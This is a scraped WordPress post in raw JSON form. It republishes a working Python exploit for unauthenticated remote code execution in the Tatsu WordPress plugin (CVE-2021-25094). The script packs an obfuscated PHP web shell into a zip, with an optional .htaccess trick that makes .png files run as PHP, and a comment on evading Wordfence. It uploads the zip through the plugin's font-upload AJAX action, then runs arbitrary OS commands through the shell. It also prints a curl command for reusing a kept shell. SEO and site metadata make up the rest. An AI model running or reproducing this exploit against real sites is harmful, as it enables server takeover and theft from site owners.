\n# Exploit Title:Tatsu 3.3.11 – Unauthenticated RCE
\n
# Date: 2025-04-16
\n
# Exploit Author: Milad Karimi (Ex3ptionaL)
\n
# Contact: miladgrayhat@gmail.com
\n
# Zone-H: www.zone-h.org\/archive\/notifier=Ex3ptionaL
\n
# MiRROR-H: https:\/\/mirror-h.org\/search\/hacker\/49626\/
\n
# Product: Tatsu wordpress plugin <= 3.3.11\n
# CVE: CVE-2021-25094
\n
# URL: https:\/\/tatsubuilder.com\/<\/p>\n
import sys
\n
import requests
\n
import argparse
\n
import urllib3
\n
import threading
\n
import time
\n
import base64
\n
import queue
\n
import io
\n
import os
\n
import zipfile
\n
import string
\n
import random
\n
from datetime import datetime<\/p>\n
urllib3.disable_warnings()<\/p>\n
class HTTPCaller():<\/p>\n
def __init__(self, url, headers, proxies, cmd):
\n
self.url = url
\n
self.headers = headers
\n
self.proxies = proxies
\n
self.cmd = cmd
\n
self.encodedCmd = base64.b64encode(cmd.encode(“utf8”))
\n
self.zipname = None
\n
self.shellFilename = None<\/p>\n
if self.url[-1] == ‘\/’:
\n
self.url = self.url[:-1]<\/p>\n
if proxies:
\n
self.proxies = {“http” : proxies, “https” : proxies}
\n
else:
\n
self.proxies = {}<\/p>\n
def generateZip(self, compressionLevel, technique, customShell, keep):
\n
buffer = io.BytesIO()
\n
with zipfile.ZipFile(buffer, “w”, zipfile.ZIP_DEFLATED, False,
\n
compressionLevel) as zipFile:<\/p>\n
if technique == “custom” and customShell and os.path.isfile(customShell):
\n
with open(customShell) as f:
\n
shell = f.readlines()
\n
shell = “\\n”.join(shell)
\n
self.shellFilename = os.path.basename(customShell)
\n
if self.shellFilename[0] != “.”:
\n
self.shellFilename = “.” + self.shellFilename<\/p>\n
zipFile.writestr(self.shellFilename, shell)<\/p>\n
elif technique == “php”:
\n
# a lazy obfuscated shell, basic bypass Wordfence
\n
# i would change base64 encoding for something better
\n
shell = “ shell += “$f = \\”lmeyst\\”;”
\n
shell += “@$a= $f[4].$f[3].$f[4].$f[5].$f[2].$f[1];”
\n
shell += “@$words = array(base64_decode($_POST[‘text’]));”
\n
shell += “$j=\\”array\\”.\\”_\\”.\\”filter\\”;”
\n
shell += “@$filtered_words = $j($words, $a);”
\n
if not keep:
\n
shell += “@unlink(__FILE__);”
\n
self.shellFilename = “.” +
\n
(”.join(random.choice(string.ascii_lowercase) for i in range(5))) + “.php”
\n
zipFile.writestr(self.shellFilename, shell)<\/p>\n
elif technique.startswith(“htaccess”):<\/p>\n
# requires AllowOverride All in the apache config file
\n
shell = “AddType application\/x-httpd-php .png\\n”
\n
zipFile.writestr(“.htaccess”, shell)<\/p>\n
shell = “ shell += “$f = \\”lmeyst\\”;”
\n
shell += “@$a= $f[4].$f[3].$f[4].$f[5].$f[2].$f[1];”
\n
shell += “@$words = array(base64_decode($_POST[‘text’]));”
\n
shell += “$j=\\”array\\”.\\”_\\”.\\”filter\\”;”
\n
shell += “@$filtered_words = $j($words, $a);”
\n
if not keep:
\n
shell += “@unlink(‘.’+’h’+’t’+’a’+’cc’+’e’+’ss’);”
\n
shell += “@unlink(__FILE__);”
\n
self.shellFilename = “.” +
\n
(”.join(random.choice(string.ascii_lowercase) for i in range(5))) + “.png”
\n
zipFile.writestr(self.shellFilename, shell)<\/p>\n
else:
\n
print(“Error: unknow shell technique %s” % technique)
\n
sys.exit(1)<\/p>\n
self.zipname = ”.join(random.choice(string.ascii_lowercase) for i in
\n
range(3))<\/p>\n
self.zipFile = buffer<\/p>\n
def getShellUrl(self):
\n
return “%s\/wp-content\/uploads\/typehub\/custom\/%s\/%s” % (self.url,
\n
self.zipname, self.shellFilename)<\/p>\n
def executeCmd(self):
\n
return requests.post(url = self.getShellUrl(), data = {“text”:
\n
self.encodedCmd}, headers = self.headers, proxies = self.proxies,
\n
verify=False)<\/p>\n
def upload(self):
\n
url = “%s\/wp-admin\/admin-ajax.php” % self.url
\n
files = {“file”: (“%s.zip” % self.zipname, self.zipFile.getvalue())}
\n
return requests.post(url = url, data = {“action”: “add_custom_font”},
\n
files = files, headers = self.headers, proxies = self.proxies, verify=False)<\/p>\n
def main():
\n
description = “|=== Tatsudo: pre-auth RCE exploit for Tatsu wordpress
\n
plugin <= 3.3.8\\n\"\n
description += “|=== CVE-2021-25094 \/ Vincent MICHEL (@darkpills)”<\/p>\n
print(description)
\n
print(“”)<\/p>\n
parser = argparse.ArgumentParser()
\n
parser.add_argument(“url”, help=”Wordpress vulnerable URL (example:
\n
https:\/\/mywordpress.com\/)”)
\n
parser.add_argument(“cmd”, help=”OS command to execute”)
\n
parser.add_argument(‘–technique’, help=”Shell technique: php | htaccess |
\n
custom”, default=”php”)
\n
parser.add_argument(‘–customShell’, help=”Provide a custom PHP shell file
\n
that will take a base64 cmd as $_POST[‘text’] input”)
\n
parser.add_argument(‘–keep’, help=”Do not auto-destruct the uploaded PHP
\n
shell”, default=False, type=bool)
\n
parser.add_argument(‘–proxy’, help=”Specify and use an HTTP proxy
\n
(example: http:\/\/localhost:8080)”)
\n
parser.add_argument(‘–compressionLevel’, help=”Compression level of the
\n
zip file (0 to 9, default 9)”, default=9, type=int)<\/p>\n
args = parser.parse_args()
\n
# Use web browser-like header
\n
headers = {
\n
“X-Requested-With”: “XMLHttpRequest”,
\n
“Origin”: args.url,
\n
“Referer”: args.url,
\n
“User-Agent”: “Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML,
\n
like Gecko) Chrome\/90.0.4430.212 Safari\/537.36″,
\n
“Accept”: “*\/*”,
\n
“Accept-Language”: “en-US,en;q=0.9”
\n
}<\/p>\n
caller = HTTPCaller(args.url, headers, args.proxy, args.cmd)
\n
print(“[+] Generating a zip with shell technique ‘%s'” % args.technique)
\n
caller.generateZip(args.compressionLevel, args.technique,
\n
args.customShell, args.keep)<\/p>\n
print(“[+] Uploading zip archive to
\n
%s\/wp-admin\/admin-ajax.php?action=add_custom_font” % (args.url))
\n
r = caller.upload()
\n
if (r.status_code != 200 or not r.text.startswith(‘{“status”:”success”‘)):
\n
print(“[!] Got an unexpected HTTP response: %d with content:\\n%s” %
\n
(r.status_code, r.text))
\n
print(“[!] Exploit failed!”)
\n
sys.exit(1)<\/p>\n
print(“[+] Upload OK”)<\/p>\n
print(“[+] Trigger shell at %s” % caller.getShellUrl())
\n
r = caller.executeCmd()
\n
if (r.status_code != 200):
\n
print(“[!] Got an unexpected HTTP response: %d with content:\\n%s” %
\n
(r.status_code, r.text))
\n
print(“[!] Exploit failed!”)
\n
sys.exit(1)
\n
print(“[+] Exploit success!”)
\n
print(r.text)<\/p>\n
if args.keep:
\n
print(“[+] Call it with:”)
\n
print(‘curl -X POST -d”text=$(echo “{0}” | base64 -w0)”
\n
{1}’.format(args.cmd, caller.getShellUrl()))
\n
else:
\n
print(“[+] Shell file has been auto-deleted but parent directory will
\n
remain on the webserver”)<\/p>\n
print(“[+] Job done”)<\/p>\n
if __name__ == ‘__main__’:
\n
main()\n<\/div>\n
View Full Exploit Details<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"Exploit Details Basic Information Exploit Title Tatsu 3.3.11 – Unauthenticated RCE Exploit ID EDB-ID:52260 Type exploitdb Published 2025-04-18T00:00:00 Modified 2025-04-18T00:00:00 CVSS Information CVSS Score 8.1…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,52,12,40,15,13,7,11,5],"class_list":["post-472","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-81","tag-exploit","tag-exploitdb","tag-high","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n
Tatsu 3.3.11 - Unauthenticated RCE - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=472\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Tatsu 3.3.11 - Unauthenticated RCE - zero redgem\" \/>\n<meta property=\"og:description\" content=\"Exploit Details Basic Information Exploit Title Tatsu 3.3.11 – Unauthenticated RCE Exploit ID EDB-ID:52260 Type exploitdb Published 2025-04-18T00:00:00 Modified 2025-04-18T00:00:00 CVSS Information CVSS Score 8.1...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=472\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-04-19T10:48:49+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=472#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=472\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Tatsu 3.3.11 – Unauthenticated RCE\",\"datePublished\":\"2025-04-19T10:48:49+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=472\"},\"wordCount\":123,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-8.1\",\"exploit\",\"exploitdb\",\"HIGH\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=472#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=472\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=472\",\"name\":\"Tatsu 3.3.11 - Unauthenticated RCE - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-04-19T10:48:49+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=472#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=472\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=472#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Tatsu 3.3.11 – Unauthenticated RCE\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Tatsu 3.3.11 - Unauthenticated RCE - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=472","og_locale":"en_US","og_type":"article","og_title":"Tatsu 3.3.11 - Unauthenticated RCE - zero redgem","og_description":"Exploit Details Basic Information Exploit Title Tatsu 3.3.11 – Unauthenticated RCE Exploit ID EDB-ID:52260 Type exploitdb Published 2025-04-18T00:00:00 Modified 2025-04-18T00:00:00 CVSS Information CVSS Score 8.1...","og_url":"https:\/\/zero.redgem.net\/?p=472","og_site_name":"zero redgem","article_published_time":"2025-04-19T10:48:49+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=472#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=472"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Tatsu 3.3.11 – Unauthenticated RCE","datePublished":"2025-04-19T10:48:49+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=472"},"wordCount":123,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-8.1","exploit","exploitdb","HIGH","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=472#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=472","url":"https:\/\/zero.redgem.net\/?p=472","name":"Tatsu 3.3.11 - Unauthenticated RCE - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-04-19T10:48:49+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=472#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=472"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=472#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Tatsu 3.3.11 – Unauthenticated RCE"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/472","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=472"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/472\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=472"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=472"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=472"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}